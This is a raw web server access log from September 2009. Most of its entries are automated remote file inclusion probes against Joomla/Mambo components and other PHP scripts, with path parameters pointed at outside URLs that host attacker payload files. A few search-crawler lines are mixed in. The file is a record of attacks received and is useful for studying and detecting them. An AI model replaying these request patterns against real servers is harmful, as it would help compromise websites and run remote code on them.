218.38.136.251 - - [07/Sep/2009:07:40:44 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:07:40:57 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:07:40:57 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:07:40:57 -0500] "GET /logs/access_log.1242950400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:07:41:02 -0500] "GET /logs/access_log.1241308800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.229 - - [07/Sep/2009:07:41:33 -0500] "GET /logs/access_log.1180915200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.136.37.141 - - [07/Sep/2009:07:42:15 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:07:42:15 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
218.38.136.251 - - [07/Sep/2009:07:42:22 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:07:42:22 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:42:35 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:07:42:35 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:07:42:48 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:07:42:48 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
218.38.136.251 - - [07/Sep/2009:07:42:54 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:07:42:55 -0500] "GET /logs/access_log.1246147200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:07:42:55 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:07:42:55 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:07:43:03 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:07:43:03 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:07:43:03 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:07:43:03 -0500] "GET /logs/access_log.1246147200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:44:40 -0500] "GET /logs/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:44:40 -0500] "GET /logs/access_log.1246924800/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 396 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:44:40 -0500] "GET /administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:44:40 -0500] "GET /logs/access_log.1243900800/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 396 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:07:44:43 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:07:44:43 -0500] "GET /logs/access_log.1247356800//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:07:44:45 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 200 204075 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:07:44:49 -0500] "GET /logs/access_log.1244764800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:45:16 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [07/Sep/2009:07:45:16 -0500] "GET /logs/access_log.1244764800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [07/Sep/2009:07:45:16 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.38.136.251 - - [07/Sep/2009:07:45:39 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:45:55 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
94.136.37.141 - - [07/Sep/2009:07:45:55 -0500] "GET /logs/access_log.1244764800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
94.136.37.141 - - [07/Sep/2009:07:45:55 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.111.80.234 - - [07/Sep/2009:07:46:25 -0500] "GET /logs/access_log.1248048000//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.106.185 - - [07/Sep/2009:07:47:02 -0500] "GET /logs/access_log.1133740800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [07/Sep/2009:07:47:13 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:48:07 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:07:48:07 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
211.234.122.171 - - [07/Sep/2009:07:49:05 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
211.234.122.171 - - [07/Sep/2009:07:49:05 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
211.234.122.171 - - [07/Sep/2009:07:49:05 -0500] "GET /logs/access_log.1240012800%22%20target=%22_blank//skin/zero_vote/ask_password.php?dir=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [07/Sep/2009:07:49:47 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.136.37.141 - - [07/Sep/2009:07:49:47 -0500] "GET /logs/access_log.1246579200//administrator/components/com_moofaq/css/file_includer.php?file=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.136.37.141 - - [07/Sep/2009:07:49:47 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.136.37.141 - - [07/Sep/2009:07:51:32 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:51:32 -0500] "GET /logs/access_log.1246752000//administrator/components/com_moofaq/css/file_includer.php?file=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:51:32 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:51:57 -0500] "GET /logs/access_log.1247443200//administrator/components/com_moofaq/css/file_includer.php?file=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
65.55.106.181 - - [07/Sep/2009:07:52:32 -0500] "GET /logs/access_log.1180310400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.136.37.141 - - [07/Sep/2009:07:54:54 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:54:54 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:54:54 -0500] "GET /logs/access_log.1246752000//administrator/components/com_moofaq/css/file_includer.php?file=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:07:55:47 -0500] "GET /logs/access_log.1247443200//administrator/components/com_moofaq/css/file_includer.php?file=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:07:56:48 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:07:56:48 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:07:56:50 -0500] "GET /logs/access_log.1241222400%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:07:57:18 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:07:57:20 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:07:57:23 -0500] "GET /logs/access_log.1241222400%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
209.51.140.58 - - [07/Sep/2009:07:59:54 -0500] "GET //?_zb_path=http://geo.metodist.ru/images/sk8.pdf? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
211.189.18.73 - - [07/Sep/2009:08:01:02 -0500] "GET //components/com_virtuemart/errors.php?error=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:08:01:02 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:08:01:03 -0500] "GET /logs/access_log.1241568000//components/com_virtuemart/errors.php?error=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.233.69.41 - - [07/Sep/2009:08:01:45 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://muhanfile.net/DATA/readme.txt??? HTTP/1.1" 200 204075 "-""libwww-perl/5.65"
211.233.69.41 - - [07/Sep/2009:08:01:45 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://muhanfile.net/DATA/readme.txt??? HTTP/1.1" 200 204075 "-""libwww-perl/5.65"
211.233.69.41 - - [07/Sep/2009:08:01:45 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://muhanfile.net/DATA/readme.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
211.233.69.41 - - [07/Sep/2009:08:01:45 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://muhanfile.net/DATA/readme.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
211.189.18.73 - - [07/Sep/2009:08:03:26 -0500] "GET /logs/access_log.1241568000//components/com_virtuemart/errors.php?error=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:08:03:26 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:08:03:36 -0500] "GET //components/com_virtuemart/errors.php?error=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.40.68.132 - - [07/Sep/2009:08:04:14 -0500] "GET /logs/access_log.1232755200/[Scripthttp://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 368 "-""libwww-perl/5.805"
211.40.68.132 - - [07/Sep/2009:08:04:14 -0500] "GET /[Scripthttp://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
211.40.68.132 - - [07/Sep/2009:08:04:15 -0500] "GET /logs/[Scripthttp://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
213.189.2.39 - - [07/Sep/2009:08:04:43 -0500] "GET //e404.php?INCLUDE_FOLDER=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
213.189.2.39 - - [07/Sep/2009:08:04:43 -0500] "GET /logs/access_log.1233619200//e404.php?INCLUDE_FOLDER=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.189.2.39 - - [07/Sep/2009:08:04:43 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:08:06:16 -0500] "GET /home.php?index=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:08:06:16 -0500] "GET /logs/home.php?index=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:08:06:16 -0500] "GET /logs/access_log.1238025600/home.php?index=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.2.39 - - [07/Sep/2009:08:06:16 -0500] "GET /logs/access_log.1239667200//e404.php?INCLUDE_FOLDER=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:08:06:40 -0500] "GET /logs/access_log.1239667200/home.php?index=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:08:06:44 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:08:06:44 -0500] "GET /logs/access_log.1239408000//newspublish/include.php?path%5Bdocroot%5D=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:08:06:53 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:08:07:07 -0500] "GET /logs/access_log.1242086400//newspublish/include.php?path%5Bdocroot%5D=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.40.25.236 - - [07/Sep/2009:08:07:33 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.40.25.236 - - [07/Sep/2009:08:07:33 -0500] "GET /logs/access_log.1233619200//e404.php?INCLUDE_FOLDER=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.40.25.236 - - [07/Sep/2009:08:07:33 -0500] "GET //e404.php?INCLUDE_FOLDER=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
209.51.140.58 - - [07/Sep/2009:08:07:41 -0500] "GET /logs/access_log.1228608000//?_zb_path=http://geo.metodist.ru/images/sk8.pdf? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
209.51.140.58 - - [07/Sep/2009:08:07:41 -0500] "GET //?_zb_path=http://geo.metodist.ru/images/sk8.pdf? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
222.122.72.216 - - [07/Sep/2009:08:07:42 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:08:07:42 -0500] "GET /logs/access_log.1244764800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:08:07:42 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.51.140.58 - - [07/Sep/2009:08:07:43 -0500] "GET /logs//?_zb_path=http://geo.metodist.ru/images/sk8.pdf? HTTP/1.1" 200 204075 "-""libwww-perl/5.810"
66.40.25.236 - - [07/Sep/2009:08:08:37 -0500] "GET /logs/access_log.1239667200//e404.php?INCLUDE_FOLDER=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:08:08:48 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:08:08:48 -0500] "GET /logs/access_log.1233619200//e404.php?INCLUDE_FOLDER=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:08:08:48 -0500] "GET //e404.php?INCLUDE_FOLDER=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:08:09:22 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:08:09:22 -0500] "GET //e404.php?INCLUDE_FOLDER=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:08:09:22 -0500] "GET /logs/access_log.1233619200//e404.php?INCLUDE_FOLDER=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:08:11:05 -0500] "GET /logs/access_log.1247097600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:08:11:06 -0500] "GET /logs/access_log.1245715200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:08:11:29 -0500] "GET /logs/access_log.1239667200//e404.php?INCLUDE_FOLDER=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.219.198.195 - - [07/Sep/2009:08:11:35 -0500] "GET /logs/errors.php?error=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.219.198.195 - - [07/Sep/2009:08:11:35 -0500] "GET /logs/access_log.1229385600/errors.php?error=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.219.198.195 - - [07/Sep/2009:08:11:35 -0500] "GET /errors.php?error=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:08:11:40 -0500] "GET /logs/access_log.1239667200//e404.php?INCLUDE_FOLDER=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
194.176.118.45 - - [07/Sep/2009:08:13:45 -0500] "GET //e404.php?INCLUDE_FOLDER=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
194.176.118.45 - - [07/Sep/2009:08:13:45 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
194.176.118.45 - - [07/Sep/2009:08:13:45 -0500] "GET /logs/access_log.1233619200//e404.php?INCLUDE_FOLDER=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:08:13:48 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:08:13:48 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:08:13:48 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
